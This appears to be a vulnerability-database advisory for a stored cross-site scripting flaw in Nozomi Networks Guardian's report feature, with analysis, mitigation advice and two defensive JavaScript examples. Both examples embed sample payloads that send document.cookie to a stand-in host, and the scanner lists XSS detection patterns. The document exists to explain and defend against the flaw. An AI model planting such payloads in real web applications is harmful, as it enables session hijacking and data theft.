CVE-2025-40892: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Nozomi Networks Guardian
A Stored Cross-Site Scripting vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing a JavaScript payload, or a victim can be socially engineered into importing a malicious report template. When the victim views or imports the report, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modifying application data, disrupting application availability, and accessing limited sensitive information.
AI Analysis
Technical Summary
CVE-2025-40892 is a stored cross-site scripting (XSS) vulnerability, CWE-79, in the Reports functionality of Nozomi Networks Guardian. The root cause is improper neutralization of a report input parameter when the report is rendered into a web page: the stored value is written into the HTML without contextual output encoding, so markup and script supplied by the report author are interpreted by the viewer's browser. The advisory describes two delivery paths. An authenticated user who holds report creation or modification privileges can save a report whose parameter carries a JavaScript payload, or a victim can be socially engineered into importing a malicious report template. In both cases the payload is persisted by the appliance and executes in the browser of whoever views or imports the report, with that user's session and privileges. Because Guardian is an OT monitoring platform, an administrator's session is a plausible target, and the script can issue any request the victim is allowed to make: modifying application data, disrupting application availability, and reading the limited sensitive information the advisory names. The page reports a CVSS 4.0 base score of 7.1 (High): the attack is network-reachable and low in complexity, but it requires either a report-privileged account or a victim willing to import the template, and in every case it requires the victim to view or import the report. It is therefore not an unauthenticated remote flaw, and its described impact is confined to the Guardian application and the data it manages. No exploit code or patch is referenced on this page, and no affected version range is listed; treat every deployed Guardian release as potentially affected until the vendor advisory (assigner: Nozomi) has been checked for fixed versions.
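To make the rendering defect concrete, here is an added example (illustrative code, not Nozomi Guardian's implementation) that places the vulnerable pattern beside the fix. The report record, its field names (title, description) and the payload are constructed for the example; the real parameter name in Guardian is not given on this page.

```javascript
// Added example: stored XSS in report rendering, vulnerable form beside the fix.
// Illustrative code only, not Nozomi Guardian's implementation. The record
// layout and field names are assumptions; the payload is a constructed sample.

// A report as it might be stored after a user with report privileges saved it.
const storedReport = {
  id: 42,
  title: 'Weekly asset inventory<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  description: 'Assets seen in the last 7 days',
};

// VULNERABLE: builds markup by string concatenation. Whatever the author typed
// into the title lands in the page as live HTML, so the onerror handler runs
// in the viewer's session as soon as the report is opened.
function renderReportVulnerable(report) {
  return `<div class="report"><h2>${report.title}</h2><p>${report.description}</p></div>`;
}

// Contextual output encoding for HTML text content. This is the
// "neutralization" CWE-79 refers to: the browser sees the five metacharacters
// as text, never as markup or attribute delimiters.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[ch]);
}

// HARDENED: same template, every untrusted field encoded on output.
function renderReportHardened(report) {
  return `<div class="report"><h2>${escapeHtml(report.title)}</h2><p>${escapeHtml(report.description)}</p></div>`;
}

// In a browser the preferred fix is to build DOM nodes and assign untrusted
// strings to textContent, never innerHTML. It needs a document, so the
// stand-alone run below does not call it.
function renderReportDom(report, doc) {
  const div = doc.createElement('div');
  const h2 = doc.createElement('h2');
  h2.textContent = report.title;
  const p = doc.createElement('p');
  p.textContent = report.description;
  div.append(h2, p);
  return div;
}

// Checks whether an <img ... onerror=...> handler survives in the rendered HTML.
function containsLiveMarkup(html) {
  return /<img\b[^>]*\bonerror=/i.test(html);
}

console.log('vulnerable output has live handler:', containsLiveMarkup(renderReportVulnerable(storedReport)));
console.log('hardened output has live handler:  ', containsLiveMarkup(renderReportHardened(storedReport)));
```

The hardened renderer leaves the stored payload intact in the database, which is the point: stored XSS is fixed at the output boundary, not by trusting that every writer of the field was well behaved. Any audit of existing reports is a separate, defence-in-depth step.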
Potential Impact
For European organizations, especially operators of critical infrastructure and industrial control systems where Nozomi Networks Guardian is deployed as the OT monitoring layer, this vulnerability could lead to significant operational disruption. A script running in a Guardian analyst's or administrator's session could manipulate monitoring data, raise false alerts or suppress real ones, and so undermine incident response. Unauthorized modification of data and access to sensitive information could amount to compliance violations under GDPR and sector regulation. Disruption of application availability could interrupt real-time monitoring, with knock-on safety and operational risk. The requirement for an authenticated, report-privileged account limits exposure but does not remove it: insider threats, compromised credentials, and the social-engineering path through imported report templates all remain. The impact is most acute in energy, manufacturing, and transportation, sectors with a large footprint in Germany, France, and the UK.
Mitigation Recommendations
Organizations should first review who holds report creation, modification, and import privileges in Guardian and restrict them to the smallest trusted group; these are the accounts from which the stored payload would originate. Treat report templates as untrusted input: import only templates produced inside the organization or obtained from the vendor through a verified channel, and inspect the template contents for HTML tags, event handlers, or script URIs before importing them. Audit existing reports and templates for the same indicators, since a payload planted before remediation remains stored until the report is edited or deleted. Input validation and contextual output encoding in the report renderer are the vendor's fix and cannot be retrofitted by the customer; a web application firewall in front of the management interface offers little protection against stored XSS carried in authenticated report definitions or uploaded template files and should not be counted as a control. Reduce the value of a hijacked session by enforcing multi-factor authentication and strong credential hygiene for Guardian accounts, and keep the management interface reachable only from a trusted administrative network. Review Guardian audit logs for report creation and import events by unexpected accounts. Coordinate with Nozomi Networks for fixed versions and apply them promptly; in the interim, disable report import if the deployment can tolerate it. A focused penetration test of the Guardian web interface for further XSS vectors is a reasonable follow-up once the fix is in place.
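The template audit recommended above can be scripted. The following added example (not Nozomi's tooling) walks a report template as exported JSON and flags every string field that contains HTML tags, event handlers, script URIs, or entity-encoded angle brackets. The template structure shown is a constructed stand-in; Guardian's real export format is not documented on this page, and the walk should be adapted to whatever the exported file actually contains.

```javascript
// Added example: pre-import audit of a report template. The JSON layout used
// here is a constructed stand-in, not Nozomi Guardian's real template format;
// adapt the walk to the real export. The rule list is deliberately
// conservative so that any hit is worth a human look.

const SUSPICIOUS = [
  { name: 'html-tag',      re: /<\s*\/?\s*(script|img|svg|iframe|object|embed|math|style|link|meta|base|form|input|a)\b/i },
  { name: 'event-handler', re: /\bon[a-z]+\s*=/i },
  { name: 'js-uri',        re: /javascript\s*:/i },
  { name: 'data-html-uri', re: /data\s*:\s*text\/html/i },
  { name: 'encoded-angle', re: /&(lt|gt|#x3c|#x3e|#60|#62);/i },
];

// Recursively visit every string in the template (object keys included, since
// a user-supplied template controls those too) and record matches with the
// JSON path where they were found.
function scanTemplate(node, path = '$', findings = []) {
  if (typeof node === 'string') {
    for (const { name, re } of SUSPICIOUS) {
      if (re.test(node)) findings.push({ path, rule: name, snippet: node.slice(0, 80) });
    }
  } else if (Array.isArray(node)) {
    node.forEach((item, i) => scanTemplate(item, `${path}[${i}]`, findings));
  } else if (node && typeof node === 'object') {
    for (const [key, value] of Object.entries(node)) {
      scanTemplate(key, `${path}.${key}(key)`, findings);
      scanTemplate(value, `${path}.${key}`, findings);
    }
  }
  return findings;
}

// Import gate: a template is acceptable only when the scan is empty.
function isSafeToImport(template) {
  return scanTemplate(template).length === 0;
}

// Constructed sample: a benign template and a copy with a stored XSS payload
// in one section title.
const cleanTemplate = {
  name: 'Weekly asset inventory',
  schedule: 'weekly',
  sections: [
    { title: 'New assets', query: 'asset.first_seen > now-7d' },
    { title: 'Alerts by severity', chart: 'bar' },
  ],
};

const maliciousTemplate = JSON.parse(JSON.stringify(cleanTemplate));
maliciousTemplate.sections[1].title =
  'Alerts by severity<svg onload="fetch(\'https://attacker.example/?s=\'+document.cookie)">';

for (const [label, tpl] of [['clean', cleanTemplate], ['malicious', maliciousTemplate]]) {
  const findings = scanTemplate(tpl);
  console.log(`${label}: safe=${isSafeToImport(tpl)} findings=${findings.length}`);
  for (const f of findings) console.log(`  ${f.path} [${f.rule}] ${f.snippet}`);
}
```

The scanner is a triage aid, not a sanitizer: a flagged template should be rejected and reviewed by a person, and a clean scan does not prove the template is harmless, because encoding tricks outside the rule list will pass. The actual fix remains the vendor's output encoding in the report renderer.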
Affected Countries
Germany, France, United Kingdom, Italy, Netherlands, Belgium, Sweden
Technical Details
- Data Version: 5.2
- Assigner Short Name: Nozomi
- Date Reserved: 2025-04-16T09:04:25.007Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 694401044eb3efac36886094
Added to database: 12/18/2025, 1:26:28 PM
Last enriched: 12/18/2025, 1:41:41 PM
Last updated: 12/18/2025, 2:50:32 PM
Related Threats
- CVE-2025-64465: CWE-125 Out-of-bounds Read in NI LabVIEW (High)
- CVE-2025-64464: CWE-125 Out-of-bounds Read in NI LabVIEW (High)
- CVE-2025-64463: CWE-125 Out-of-bounds Read in NI LabVIEW (High)
- CVE-2025-64462: CWE-125 Out-of-bounds Read in NI LabVIEW (High)
- CVE-2025-1031: CWE-639 Authorization Bypass Through User-Controlled Key in Utarit Informatics Services Inc. SoliClub (High)